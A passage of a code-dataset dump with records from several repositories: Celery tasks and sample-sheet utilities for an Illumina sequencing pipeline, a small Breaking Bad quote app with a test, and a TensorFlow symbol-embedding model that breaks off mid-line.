__get_index_cycles_from_run_info_file(\n run_info_file_path=run_info_file_path,\n get_default_values=True)\n\n index_cycles = default_index_cycles \\\n if index_cycles_from_metadata == index_cycles_from_run_info_file\\\n else index_cycles_from_metadata\n\n logger.info('Editing index cycles on: {}\\n'\n 'Old values:{}\\n'\n 'New values: {}'.format(run_info_file_path,\n index_cycles_from_run_info_file,\n index_cycles))\n\n run_info_file = IEMRunInfoReader(run_info_file_path)\n run_info_file.set_index_cycles(index_cycles)\n\n\[email protected](name='presta.app.tasks.move', ignore_result=True)\ndef move(src, dest):\n try:\n shutil.move(src, dest)\n except shutil.Error as e:\n logger.error('Source not moved. 
Error: {}'.format(e))\n\n\[email protected](name='presta.app.tasks.bcl2fastq')\ndef bcl2fastq(**kwargs):\n rd_path = kwargs.get('rd_path')\n ds_path = kwargs.get('ds_path')\n ssht_path = kwargs.get('ssht_path')\n no_lane_splitting = kwargs.get('no_lane_splitting', False)\n barcode_mismatches = kwargs.get('barcode_mismatches', 1)\n submit_to_batch_scheduler = kwargs.get('batch_queuing', True)\n queue_spec = kwargs.get('queue_spec')\n\n command = 'bcl2fastq'\n rd_arg = '-R {}'.format(rd_path)\n output_arg = '-o {}'.format(ds_path)\n samplesheet_arg = '--sample-sheet {}'.format(ssht_path)\n options = ['--ignore-missing-bcls',\n '--ignore-missing-filter',\n '--ignore-missing-positions',\n '--find-adapters-with-sliding-window',\n '--barcode-mismatches {}'.format(barcode_mismatches)]\n\n if no_lane_splitting:\n options.append('--no-lane-splitting')\n\n with open(ssht_path, 'r') as f:\n samplesheet = IEMSampleSheetReader(f)\n\n barcode_mask = samplesheet.get_barcode_mask()\n for lane, barcode_length in barcode_mask.items():\n if barcode_length['index1'] is None or barcode_length['index1'] in ['None']:\n options.append(\"--use-bases-mask {}:Y*,I{}n*,Y*\".format(lane, barcode_length['index']))\n else:\n options.append(\n \"--use-bases-mask {}:Y*,I{}n*,I{}n*,Y*\".format(lane, barcode_length['index'], barcode_length['index1']))\n\n cmd_line = shlex.split(' '.join([command, rd_arg, output_arg,\n samplesheet_arg, ' '.join(options)]))\n logger.info('Executing {}'.format(cmd_line))\n\n if submit_to_batch_scheduler:\n home = os.path.expanduser(\"~\")\n launcher = kwargs.get('launcher', 'launcher')\n\n jt = {'jobName': command,\n 'nativeSpecification': queue_spec,\n 'remoteCommand': os.path.join(home, launcher),\n 'args': cmd_line\n }\n output = runGEJob(jt)\n else:\n output = runJob(cmd_line)\n\n return True if output else False\n\n\[email protected](name='presta.app.tasks.qc_runner', ignore_result=True)\ndef qc_runner(file_list, **kwargs):\n def chunk(lis, n):\n return [lis[i:i + n] for i in range(0, len(lis), n)]\n\n chunk_size = kwargs.get('chunk_size', 6)\n for f in chunk(file_list, chunk_size):\n fastqc.s(f, outdir=kwargs.get('outdir'),\n threads=chunk_size,\n batch_queuing=kwargs.get('batch_queuing'),\n queue_spec=kwargs.get('queue_spec')\n ).delay()\n\n\[email protected](name='presta.app.tasks.fastqc')\ndef fastqc(fq_list, **kwargs):\n command = 'fastqc'\n output_arg = '--outdir {}'.format(kwargs.get('outdir'))\n options = ['--format fastq',\n '--threads {}'.format(kwargs.get('threads', 1))]\n fq_list_arg = ' '.join(fq_list)\n submit_to_batch_scheduler = kwargs.get('batch_queuing', True)\n queue_spec = kwargs.get('queue_spec')\n\n cmd_line = shlex.split(' '.join([command, output_arg, ' '.join(options),\n fq_list_arg]))\n logger.info('Executing {}'.format(cmd_line))\n\n if submit_to_batch_scheduler:\n home = os.path.expanduser(\"~\")\n launcher = kwargs.get('launcher', 'launcher')\n\n jt = {'jobName': command,\n 'nativeSpecification': queue_spec,\n 'remoteCommand': os.path.join(home, launcher),\n 'args': cmd_line\n }\n output = runGEJob(jt)\n else:\n output = runJob(cmd_line)\n\n return True if output else False\n\n\ndef __set_imetadata(ir_conf, ipath, imetadata):\n\n ir = build_object_store(store='irods',\n host=ir_conf['host'],\n port=ir_conf['port'],\n user=ir_conf['user'],\n password=ir_conf['password'].encode('ascii'),\n zone=ir_conf['zone'])\n for m in imetadata:\n ir.add_object_metadata(path=ipath,\n meta=(m.get('name'),\n m.get('value') if len(m.get('value')) > 0 else None,\n 
m.get('units')))\n ir.sess.cleanup()\n\n\ndef __copy_file_into_irods(**kwargs):\n ir_conf = kwargs.get('conf')\n file_path = kwargs.get('file_path')\n irods_path = kwargs.get('irods_path')\n\n ir = build_object_store(store='irods',\n host=ir_conf['host'],\n port=ir_conf['port'],\n user=ir_conf['user'],\n password=ir_conf['password'].encode('ascii'),\n zone=ir_conf['zone'])\n\n logger.info('Coping from FS {} to iRODS {}'.format(file_path, irods_path))\n\n ir.put_object(source_path=file_path, dest_path=irods_path, force=True)\n ir.sess.cleanup()\n\n\ndef __get_index_cycles_from_metadata(ir_conf, rundir_label):\n ipath = os.path.join(ir_conf['runs_collection'],\n rundir_label)\n rundir_has_metadata, imetadata = check_metadata(ir_conf=ir_conf,\n ipath=ipath,\n get_metadata=True)\n if rundir_has_metadata:\n return dict(index=next((m['value'] for m in imetadata\n if m[\"name\"] == \"index1_cycles\" and m['value'] != \"None\"), None),\n index1=next((m['value'] for m in imetadata\n if m[\"name\"] == \"index2_cycles\" and m['value'] != \"None\"), None),\n )\n\n return dict(index=None, index1=None)\n\n\ndef __get_index_cycles_from_run_info_file(run_info_file_path, get_default_values=False):\n with open(run_info_file_path, 'r') as f:\n run_info_file = IEMRunInfoReader(f)\n\n if get_default_values:\n return run_info_file.get_index_cycles(), run_info_file.get_default_index_cycles()\n\n return run_info_file.get_index_cycles()\n\n\ndef runGEJob(jt_attr):\n def init_job_template(jt, attr):\n jt.jobName = '_'.join(['presta', attr['jobName']])\n jt.nativeSpecification = attr['nativeSpecification']\n jt.remoteCommand = attr['remoteCommand']\n jt.args = attr['args']\n return jt\n\n with drmaa.Session() as s:\n jt = init_job_template(s.createJobTemplate(), jt_attr)\n jobid = s.runJob(jt)\n logger.info('Your job has been submitted with ID %s' % jobid)\n\n retval = s.wait(jobid, drmaa.Session.TIMEOUT_WAIT_FOREVER)\n logger.info('Job: {0} finished with status {1}'.format(retval.jobId,\n retval.exitStatus))\n\n logger.info('Cleaning up')\n s.deleteJobTemplate(jt)\n\n return retval.hasExited\n\n\ndef runJob(cmd):\n try:\n subprocess.check_output(cmd)\n return True\n except subprocess.CalledProcessError as e:\n logger.info(e)\n if e.output:\n logger.info(\"command output: %s\", e.output)\n else:\n logger.info(\"no command output available\")\n return False\n"
},
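To make the bcl2fastq task in presta/app/tasks.py above concrete, here is what its --use-bases-mask construction produces for a hypothetical barcode mask (values invented for illustration; the branching mirrors the task's code):

barcode_mask = {'1': {'index': 8, 'index1': None},
                '2': {'index': 8, 'index1': 8}}
options = []
for lane, lengths in sorted(barcode_mask.items()):
    if lengths['index1'] is None or lengths['index1'] in ['None']:
        # single-index lane: one I<n>n* block between the two reads
        options.append("--use-bases-mask {}:Y*,I{}n*,Y*".format(lane, lengths['index']))
    else:
        # dual-index lane: two I<n>n* blocks
        options.append("--use-bases-mask {}:Y*,I{}n*,I{}n*,Y*".format(
            lane, lengths['index'], lengths['index1']))
print(options)
# ['--use-bases-mask 1:Y*,I8n*,Y*', '--use-bases-mask 2:Y*,I8n*,I8n*,Y*']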
{
"alpha_fraction": 0.5342350006103516,
"alphanum_fraction": 0.5381797552108765,
"avg_line_length": 31.70967674255371,
"blob_id": "f07b6721dc7a3e83e1f4bd8056e685aa93f98dc3",
"content_id": "ac16a6ecab57cb103917053f3fb6ebe8f39b18d7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7098,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 217,
"path": "/presta/utils/__init__.py",
"repo_name": "ratzeni/presta",
"src_encoding": "UTF-8",
"text": "\"\"\"\nUtilities used by other modules.\n\"\"\"\n\nimport csv\nimport os\nimport re\nimport string\nimport sys\n\nimport xml.etree.ElementTree as ET\nfrom alta import ConfigurationFromYamlFile\nfrom pkg_resources import resource_filename\n\nSAMPLES_WITHOUT_BARCODES = [2, 8]\nDEFAULT_INDEX_CYCLES = dict(index='8', index1='8')\n\nclass IEMRunInfoReader:\n \"\"\"\n Illumina Experimental Manager RunInfo xml reader.\n \"\"\"\n\n def __init__(self, f):\n self.xml_file = f\n self.tree = ET.parse(self.xml_file)\n self.root = self.tree.getroot()\n\n def get_reads(self):\n reads = [r.attrib for r in self.root.iter('Read')]\n return reads\n\n def get_indexed_reads(self):\n reads = self.get_reads()\n return filter(lambda item: item[\"IsIndexedRead\"] == \"Y\", reads)\n\n def get_index_cycles(self):\n indexed_reads = self.get_indexed_reads()\n return dict(\n index=next((item['NumCycles'] for item in indexed_reads\n if item[\"IsIndexedRead\"] == \"Y\" and item['Number'] == \"2\"), None),\n index1=next((item['NumCycles'] for item in indexed_reads\n if item[\"IsIndexedRead\"] == \"Y\" and item['Number'] != \"2\"), None))\n\n def get_default_index_cycles(self):\n return DEFAULT_INDEX_CYCLES\n\n def set_index_cycles(self, index_cycles, write=True):\n\n for read in self.root.iter('Read'):\n if read.attrib[\"IsIndexedRead\"] == \"Y\":\n if read.attrib['Number'] == '2':\n read.attrib.update(NumCycles=index_cycles.get('index', DEFAULT_INDEX_CYCLES['index']))\n else:\n read.attrib.update(NumCycles=index_cycles.get('index', DEFAULT_INDEX_CYCLES['index']))\n if write:\n self.tree.write(self.xml_file)\n\n\n\nclass IEMSampleSheetReader(csv.DictReader):\n \"\"\"\n Illumina Experimental Manager SampleSheet reader.\n \"\"\"\n\n def __init__(self, f):\n csv.DictReader.__init__(self, f, delimiter=',')\n self.header = ''\n self.data = ''\n\n first_line = f.readline()\n if not first_line.startswith('[Header]'):\n raise ValueError('%s is not an IEM samplesheet'.format(f.name))\n header = [first_line.strip()]\n l = f.readline()\n while not l.startswith('[Data]'):\n header.append(l.strip()) # ms-dos\n l = f.readline()\n else:\n header.append(l.strip())\n self.header = header\n\n self.data = csv.DictReader(f.readlines(), delimiter=',')\n\n def barcodes_have_the_same_size(self):\n def mean(data):\n \"\"\"Return the sample arithmetic mean of data.\"\"\"\n n = len(data)\n if n < 1:\n raise ValueError('mean requires at least one data point')\n return sum(data) / float(n)\n\n def _ss(data):\n \"\"\"Return sum of square deviations of sequence data.\"\"\"\n c = mean(data)\n ss = sum((x - c) ** 2 for x in data)\n return ss\n\n def pstdev(data):\n \"\"\"Calculates the population standard deviation.\"\"\"\n n = len(data)\n\n if n < 2:\n raise ValueError('variance requires at least two data points')\n ss = _ss(data)\n pvar = ss / n # the population variance\n return pvar ** 0.5\n\n lengths = []\n to_be_verified = ['index']\n\n for row in self.data:\n for f in self.data.fieldnames:\n if f in to_be_verified:\n lengths.append(len(row[f]))\n\n if len(lengths) == 0:\n return True\n\n return True if pstdev(lengths) == float(0) else False\n\n def get_body(self, label='Sample_Name', new_value='', replace=True):\n def sanitize(mystr):\n \"\"\"\n Sanitize string in accordance with Illumina's documentation\n bcl2fastq2 Conversion Software v2.17 Guide\n \"\"\"\n retainlist = \"_-\"\n return re.sub(r'[^\\w' + retainlist + ']', '_', mystr)\n\n body = []\n for i in self.header:\n body.append(i)\n body.append('\\n')\n 
body.append(string.join(self.data.fieldnames, ','))\n body.append('\\n')\n\n to_be_sanitized = ['Sample_Project', 'Sample_Name']\n\n for row in self.data:\n for f in self.data.fieldnames:\n if replace and f == label:\n body.append(new_value)\n else:\n if f in to_be_sanitized:\n body.append(sanitize(row[f]))\n else:\n body.append(row[f])\n body.append(',')\n body.append('\\n')\n\n return body\n\n def get_barcode_mask(self):\n barcodes_mask = dict()\n\n for row in self.data:\n if row['Lane'] not in barcodes_mask:\n barcodes_mask[row['Lane']] = dict(\n index=len(row['index']) if 'index' in row else None,\n index1=len(row['index1']) if 'index1' in row else None,\n )\n\n return barcodes_mask\n\n\n\ndef get_conf(logger, config_file):\n config_file_path = paths_setup(logger, config_file)\n\n # Load YAML configuration file\n return ConfigurationFromYamlFile(config_file_path)\n\n\ndef path_exists(path, logger, force=True):\n def file_missing(path, logger, force):\n if force:\n logger.error(\"path - {} - doesn't exists\".format(path))\n sys.exit()\n return False\n\n return True if os.path.exists(os.path.expanduser(path)) else file_missing(path,\n logger,\n force)\n\n\ndef paths_setup(logger, cf_from_cli=None):\n home = os.path.expanduser(\"~\")\n presta_config_from_home = os.path.join(home, 'presta',\n 'presta_config.yml')\n presta_config_from_package = resource_filename('presta',\n 'config/presta_config.yml')\n config_file_paths = []\n if cf_from_cli and path_exists(cf_from_cli, logger, force=False):\n config_file_paths.append(WeightedPath(cf_from_cli, 0))\n if path_exists(presta_config_from_home, logger, force=False):\n config_file_paths.append(WeightedPath(presta_config_from_home, 1))\n if path_exists(presta_config_from_package, logger, force=False):\n config_file_paths.append(WeightedPath(presta_config_from_package, 2))\n\n logger.debug(\"config file paths: {}\".format(config_file_paths))\n\n return sorted(config_file_paths)[0].path\n\n\nclass WeightedPath(object):\n def __init__(self, path, weight):\n self.path = path\n self.weight = weight\n\n def __repr__(self):\n return '{}: {} {}'.format(self.__class__.__name__,\n self.path,\n self.weight)\n\n def __cmp__(self, other):\n if hasattr(other, 'weight'):\n return self.weight.__cmp__(other.weight)\n"
}
] | 9 |
aanwar5/BreakingBadQuoteFunc | https://github.com/aanwar5/BreakingBadQuoteFunc | c23ad45d5dd1173b219e1127a11edc1a9edbf6c8 | fe40ce6821d41063bf28168cee0493554cc5c4fd | 25cf2d455d2a394547be1c62cd44308faf33bb8e | refs/heads/master | 2023-06-01T12:50:47.895234 | 2021-06-29T10:03:47 | 2021-06-29T10:03:47 | 380,433,631 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7032967209815979,
"alphanum_fraction": 0.7032967209815979,
"avg_line_length": 22,
"blob_id": "d82566045523de862c1627f01ccd578abe145b29",
"content_id": "7689c07b4b58801c5a0fbe85eb99eda6562a5812",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 4,
"path": "/tests/test_lib.py",
"repo_name": "aanwar5/BreakingBadQuoteFunc",
"src_encoding": "UTF-8",
"text": "from bbquote.lib import get_quote\n\ndef test_getquote():\n assert type(get_quote()) == str"
},
{
"alpha_fraction": 0.7099999785423279,
"alphanum_fraction": 0.7099999785423279,
"avg_line_length": 10.11111068725586,
"blob_id": "bae471130ebbb735b1bda086ea4cd462136b8410",
"content_id": "392dee21a1d5da46d483f81d8870501490652074",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 100,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 9,
"path": "/app.py",
"repo_name": "aanwar5/BreakingBadQuoteFunc",
"src_encoding": "UTF-8",
"text": "import streamlit as st\n\nfrom bbquote.lib import get_quote\n\nquote = get_quote()\n\n'Hello'\n\nf\"{quote}\"\n"
}
] | 2 |
akamaus/emlambda | https://github.com/akamaus/emlambda | dd46c06f4511aa84bb3951460700e6420815bd20 | 7af36f9dee3d3032bf615bff37fa64b9427f5f54 | dab84853f25cc95c22c7ca9e518561f4624bdc50 | refs/heads/master | 2021-01-13T03:46:36.047823 | 2017-01-09T06:58:18 | 2017-01-09T06:58:18 | 77,207,830 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5789567232131958,
"alphanum_fraction": 0.5842976570129395,
"avg_line_length": 33.460121154785156,
"blob_id": "ab5767f1f94f99c2ecf5fc69a875bac0ee6934e3",
"content_id": "59eea37af591678398b783b0be2228f212d45dac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5617,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 163,
"path": "/model.py",
"repo_name": "akamaus/emlambda",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Linear:\n def __init__(self, inp_size, out_size, name = None):\n self.weights = tf.Variable(tf.truncated_normal([inp_size, out_size], stddev=1), name=name + \"_weights\")\n tf.summary.histogram(name + '_weights', self.weights)\n\n def apply(self, inp):\n return tf.matmul(inp, self.weights)\n\n def parameters(self):\n return {'weights': self.weights}\n\nclass Affine:\n def __init__(self, inp_size, out_size, name=None):\n self.weights = tf.Variable(tf.truncated_normal([inp_size, out_size], stddev=1), name=name + \"_weights\")\n self.biases = tf.Variable(tf.truncated_normal([out_size], stddev=1), name=name + \"_biases\")\n tf.summary.histogram(name + '_weights', self.weights)\n tf.summary.histogram(name + '_biases', self.biases)\n\n def apply(self, inp):\n return tf.matmul(inp, self.weights) + self.biases\n\n def parameters(self):\n return {'weights': self.weights, 'biases': self.biases}\n\n\nclass Model:\n \"\"\"A model for learning symbol-hierarchy embedding.\n Symbols initially represented as one-hot rows (of size sym_width)\n which got embedded into Code vector-space (rows of size code_width)\"\"\"\n def __init__(self, num_symbols, code_width):\n self.code_width = code_width\n self.num_syms = num_symbols\n self.sym_width = num_symbols\n # symbol tables\n self.symbols = [i for i in range(1, num_symbols + 1)]\n self.sym_dict = {}\n\n for i, c in enumerate(self.symbols):\n self.sym_dict[c] = np.zeros(self.sym_width)\n self.sym_dict[c][i] = 1\n\n # Null Symbol\n self.EmptyCode = Model.matrix([code_width], 'EmptyCode')\n tf.summary.histogram(\"EmptyCode_weights\", self.EmptyCode)\n\n # embeds symbol\n self.Coder = Linear(num_symbols, code_width, 'Coder')\n # merges two embeddings to produce a tuple\n self.Tuple = Affine(code_width * 2, code_width, 'Tuple')\n # deconstruct tuple\n self.UnTuple = Affine(code_width, code_width*2, 'UnTuple')\n # detects if its a symbol or a Tuple\n self.TypeDetector = Affine(code_width, 2, 'TypeDetector')\n # morphisms\n self.LR = Linear(code_width, code_width, 'LR')\n self.RL = Linear(code_width, code_width, 'RL')\n\n all_params = []\n for m in [self.Coder, self.Tuple, self.UnTuple, self.TypeDetector, self.LR, self.RL]:\n all_params += m.parameters().items()\n self.net_saver = tf.train.Saver(dict(all_params))\n\n plt.ion()\n self.fig = plt.figure()\n self.ax = self.fig.add_subplot(1, 1, 1)\n self.first_draw = True\n\n def one_hot(self, symbols):\n \"\"\"one-hot encoding of symbol or list of symbols\"\"\"\n if type(symbols) is int:\n res = self.sym_dict[symbols]\n elif type(symbols) is list:\n res = map(lambda s: self.sym_dict[s], symbols)\n else: raise Exception(\"Unknown type passed to model.one_hot\" + str(type(symbols)))\n return res\n\n def embed(self, one_hot):\n \"\"\"Embeds a symbol (or list of symbols) into vector-space\"\"\"\n return self.Coder.apply(one_hot)\n\n def type_detector(self, code):\n \"\"\"Returns logits corresponding to code belong to different classes\"\"\"\n return self.TypeDetector.apply(code)\n\n def empty_code(self):\n \"\"\"Returns a code for empty symbol\"\"\"\n return self.EmptyCode\n\n def tuple(self, c1, c2):\n \"\"\"Makes a tuple of two args\"\"\"\n return self.Tuple.apply(tf.concat(1, [c1, c2]))\n\n def untuple(self, c):\n \"\"\"Splits tuple code into two subcomponents\"\"\"\n res = self.UnTuple.apply(c)\n return tf.split(1, 2, res)\n\n def left_to_right(self, c):\n return self.LR.apply(c)\n\n def right_to_left(self, c):\n return 
self.RL.apply(c)\n\n def draw_matrices(self, vis_data):\n xs = vis_data['coder']['weights'][:, 0]\n ys = vis_data['coder']['weights'][:, 1]\n\n rev_xs = vis_data['rev_seqs'][0][:, 0]\n rev_ys = vis_data['rev_seqs'][0][:, 1]\n\n tup_xs = vis_data['tuple_codes'][:, 0]\n tup_ys = vis_data['tuple_codes'][:, 1]\n\n s = 20\n if self.first_draw:\n self.seqs_plot, self.rev_plot, self.tuple_plot = self.ax.plot(xs, ys, '+', rev_xs, rev_ys, 'go', tup_xs, tup_ys, 'rp')\n self.ax.set_xlim(-s, s)\n self.ax.set_ylim(-s, s)\n self.first_draw = False\n# self.fig.show()\n else:\n self.seqs_plot.set_xdata(xs)\n self.seqs_plot.set_ydata(ys)\n self.rev_plot.set_xdata(rev_xs)\n self.rev_plot.set_ydata(rev_ys)\n self.tuple_plot.set_xdata(tup_xs)\n self.tuple_plot.set_ydata(tup_ys)\n\n self.ax.relim()\n self.ax.autoscale_view()\n self.fig.canvas.draw()\n\n def print_matrices(self, sess):\n print('EmptyCode')\n print(sess.run(self.EmptyCode))\n\n print('Coder:')\n print(sess.run(self.Coder.parameters()))\n\n print('Tuple:')\n print(sess.run(self.Tuple.parameters()))\n\n print('UnTuple:')\n print(sess.run(self.UnTuple.parameters()))\n\n print('LR')\n print(sess.run(self.LR.parameters()))\n\n print('RL')\n print(sess.run(self.RL.parameters()))\n\n @staticmethod\n def matrix(shape, name = None):\n return tf.Variable(tf.truncated_normal(shape, stddev=1), name=name)\n\n def affine(inp, out, name = None):\n\n return tf.Variable()\n"
},
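The Tuple/UnTuple pair in model.py above is trained so that untuple(tuple(a, b)) reconstructs (a, b). A plain-numpy sketch of that round-trip objective (biases omitted, shapes assumed as in the model; editorial, not from the repository):

import numpy as np

code_width = 2
W_t = np.random.randn(2 * code_width, code_width)    # Tuple weights
W_u = np.random.randn(code_width, 2 * code_width)    # UnTuple weights

a = np.random.randn(1, code_width)
b = np.random.randn(1, code_width)
tup = np.concatenate([a, b], axis=1) @ W_t           # like model.tuple(a, b)
a_rec, b_rec = np.split(tup @ W_u, 2, axis=1)        # like model.untuple(tup)
loss = np.mean((a - a_rec) ** 2 + (b - b_rec) ** 2)  # reconstruction error to minimize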
{
"alpha_fraction": 0.5929344296455383,
"alphanum_fraction": 0.6037521958351135,
"avg_line_length": 38.69969940185547,
"blob_id": "d15b3f27614380b05dfac483d2bb877dd8aafa8a",
"content_id": "b82abfdbe59fa35872fbfc9b5e7ac098dd7e53fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13219,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 333,
"path": "/embedding.py",
"repo_name": "akamaus/emlambda",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\nfrom time import localtime, strftime\n\nimport os\nimport tensorflow as tf\nimport random\n\nfrom model import Model\n\nFLAGS = tf.app.flags.FLAGS\n\ntf.app.flags.DEFINE_integer('steps', 100000, 'Number of steps until stop')\ntf.app.flags.DEFINE_integer('batch_size', 50, 'Number of examples in mini-batch')\n\ntf.app.flags.DEFINE_integer('num_symbols', 8, 'Atomic symbols number')\ntf.app.flags.DEFINE_integer('code_width', 2, 'Number of embedding dimensions')\ntf.app.flags.DEFINE_integer('seq_len', 2, 'Maximal length of symbol sequences to learn')\n\n# Model\nmodel = Model(num_symbols=FLAGS.num_symbols, code_width=FLAGS.code_width)\n\n# some constants and initialization\nf32 = tf.float32\npair_sz = 2\neps = 1e-6\nexperiment = \"exp-voc\" + str(FLAGS.num_symbols) + \"-code\" + str(FLAGS.code_width) + \"-seq\" + str(FLAGS.seq_len)\n\n\ndef ensure_dir(d):\n \"\"\"Creates dir if it doesn't exist\"\"\"\n if not os.path.exists(d):\n os.makedirs(d)\n\n\ndef sym_list(list_len, different=False):\n \"\"\"Generates a list of identifiers (to be used, for example to combine into single code)\"\"\"\n if different:\n lst = random.sample(model.symbols, list_len)\n else:\n lst = [random.choice(model.symbols) for x in range(list_len)]\n return model.one_hot(lst)\n\n\ndef sym_list_batch(list_len, batch, different=False):\n \"\"\"Generates a batch of identifier sequence\"\"\"\n batch = [list(sym_list(list_len, different)) for x in range(batch)]\n return batch\n\n\ndef seq_coder_l(symbol_codes):\n \"\"\"Takes list of codes representing symbol-code sequence\n folds it into a single code. Returns summary code and list of accumulated results\"\"\"\n tuples = []\n with tf.name_scope('seq_coder_l'):\n b = tf.shape(symbol_codes[0])[0]\n c = tf.tile(tf.expand_dims(model.empty_code(), axis=0), [b, 1])\n for ci in symbol_codes:\n tuples.append(c)\n c = model.tuple(c,ci)\n return c, tuples\n\n\ndef seq_decoder_l(seq_code, seq_length):\n \"\"\"Takes a code representing symbol sequence and unfolds it\"\"\"\n tuples = []\n symbols = []\n with tf.name_scope('seq_decoder_l'):\n for i in range(seq_length):\n seq_code,symbol = model.untuple(seq_code)\n tuples.append(seq_code)\n symbols.append(symbol)\n tuples.reverse()\n symbols.reverse()\n return symbols, tuples\n\n\ndef seq_coder_r(symbol_codes):\n \"\"\"Foldr. Returns summary code and list of accumulated results\"\"\"\n tuples = []\n with tf.name_scope('seq_coder_r'):\n b = tf.shape(symbol_codes[0])[0]\n c = tf.tile(tf.expand_dims(model.empty_code(), axis=0), [b, 1])\n cs = list(symbol_codes)\n cs.reverse()\n for ci in cs:\n tuples.append(c)\n c = model.tuple(ci,c)\n return c, tuples\n\n\ndef seq_decoder_r(seq_code, seq_length):\n \"\"\"Unflodr. 
Takes a code representing symbol sequence and unfolds it\"\"\"\n tuples = []\n symbols = []\n with tf.name_scope('seq_decoder_r'):\n for i in range(seq_length):\n symbol, seq_code = model.untuple(seq_code)\n tuples.append(seq_code)\n symbols.append(symbol)\n tuples.reverse()\n return symbols, tuples\n\n\n# Learners\ndef learn_coder(p_diff_ids):\n \"\"\"Subgraph for learning coder\"\"\"\n with tf.name_scope('coder_learner') as scope:\n diff_codes = tf.reshape(model.embed(one_hot=tf.reshape(p_diff_ids, [-1, model.sym_width])),\n [-1, pair_sz, model.code_width])\n diff_pairs = tf.transpose(diff_codes, perm=[1, 0, 2])\n diff_cs = tf.unpack(diff_pairs)\n code_dist = tf.reduce_sum(tf.squared_difference(diff_cs[0], diff_cs[1]), 1)\n code_loss = tf.reduce_mean(1 / code_dist)\n tf.summary.scalar('code_loss', code_loss)\n code_min = tf.reduce_min(code_dist)\n tf.summary.scalar('code_min', code_min)\n return code_loss, code_min\n\n\ndef learn_tuple(seqs):\n \"\"\"Subgraph for learning tuple/untuple modules\"\"\"\n with tf.name_scope('learn_tuple'):\n seq_list = tf.unpack(seqs)\n tup_codes = model.tuple(seq_list[0], seq_list[1])\n rev_seqs = model.untuple(tup_codes)\n tuple_sqr_dist = tf.squared_difference(seqs, rev_seqs)\n tuple_loss = tf.reduce_mean(tuple_sqr_dist)\n tf.summary.scalar('tuple_loss', tuple_loss)\n tuple_max = tf.sqrt(tf.reduce_max(tuple_sqr_dist))\n tf.summary.scalar('tuple_max', tuple_max)\n return tuple_loss, tuple_max, tup_codes, rev_seqs\n\n\ndef learn_fold(seqs, assoc):\n \"\"\"Subgraph for learning folds consisting of repeating tuple applications (left or right associativity)\"\"\"\n with tf.name_scope('learn_fold') as scope:\n if assoc == 'Left':\n params = {'coder': seq_coder_l,\n 'decoder': seq_decoder_l,\n 'suffix': '_l'}\n elif assoc == 'Right':\n params = {'coder': seq_coder_r,\n 'decoder': seq_decoder_r,\n 'suffix': '_r'}\n else:\n raise Exception('unknown dir')\n\n seq_list = tf.unpack(seqs)\n code, tup_codes = params['coder'](seq_list)\n rev_seqs, rev_tup_codes = params['decoder'](code, FLAGS.seq_len)\n seq_sqr_dist = tf.squared_difference(seqs, rev_seqs)\n tup_sqr_dist = tf.squared_difference(tup_codes, rev_tup_codes)\n seq_loss = tf.reduce_mean(seq_sqr_dist)\n tup_loss = tf.reduce_mean(tup_sqr_dist)\n tf.summary.scalar('seq_loss' + params['suffix'], seq_loss)\n tf.summary.scalar('tup_loss' + params['suffix'], tup_loss)\n tup_max = tf.sqrt(tf.reduce_max(tup_sqr_dist))\n seq_max = tf.sqrt(tf.reduce_max(seq_sqr_dist))\n tf.summary.scalar('seq_max' + params['suffix'], seq_max)\n tf.summary.scalar('tup_max' + params['suffix'], tup_max)\n return code, seq_max, tup_max, seq_loss, tup_loss, rev_seqs\n\n\ndef learn_morphisms(code_l, code_r):\n \"\"\"Subgraph for learning morphisms\"\"\"\n with tf.name_scope('learn_morphisms'):\n code_lr = model.left_to_right(code_l)\n code_rl = model.right_to_left(code_r)\n\n code_dist_lr_loss = tf.reduce_mean(tf.squared_difference(code_lr, code_r))\n code_dist_rl_loss = tf.reduce_mean(tf.squared_difference(code_rl, code_l))\n tf.summary.scalar('code_dist_lr', code_dist_lr_loss)\n tf.summary.scalar('code_dist_rl', code_dist_rl_loss)\n return code_dist_lr_loss, code_dist_rl_loss\n\n\ndef restoration_precision(seqs, rev_seqs, all_codes):\n \"\"\"Subgraph for restoration stats for symbols\"\"\"\n with tf.name_scope('restoration_stats'):\n def codes_to_ids(codes):\n codes_1 = tf.expand_dims(codes, 2)\n dists = tf.reduce_sum(tf.squared_difference(codes_1, all_codes), 3)\n ids = tf.arg_min(dists, 2)\n return ids\n\n orig_ids = codes_to_ids(seqs)\n 
rev_ids = codes_to_ids(rev_seqs)\n\n restorations = tf.equal(orig_ids, rev_ids)\n num_restored = tf.reduce_sum(tf.cast(restorations, dtype=tf.float32), 0)\n # stats[i] is number of sequences with i-th element restored\n elem_restoration_stats = tf.reduce_sum(tf.cast(restorations, dtype=tf.int32), 1)\n # hist[i] - is number of sequences with i properly restored elements\n num_proper_restorations_hist = tf.histogram_fixed_width(num_restored,\n [0.0, FLAGS.seq_len+1.0], FLAGS.seq_len+1, dtype=tf.int32)\n\n tf.summary.histogram('num_restored', num_restored)\n return elem_restoration_stats, num_proper_restorations_hist\n\n\ndef vis_tuple(seqs):\n \"\"\"Subgraph for visualizing tuples and restored symbols\"\"\"\n with tf.name_scope('vis_tuple'):\n seq_list = tf.unpack(seqs)\n tup_codes = model.tuple(seq_list[0], seq_list[1])\n rev_seqs = model.untuple(tup_codes)\n return tup_codes, rev_seqs\n\n\ndef learn_type_detector(codes, tuples):\n \"\"\"Subgraph for type detector learning\"\"\"\n code_labels = tf.tile(tf.constant([0], dtype=tf.int64), [tf.shape(codes)[0]])\n tuple_labels = tf.tile(tf.constant([1], dtype=tf.int64), [tf.shape(tuples)[0]])\n labels = tf.concat(0, 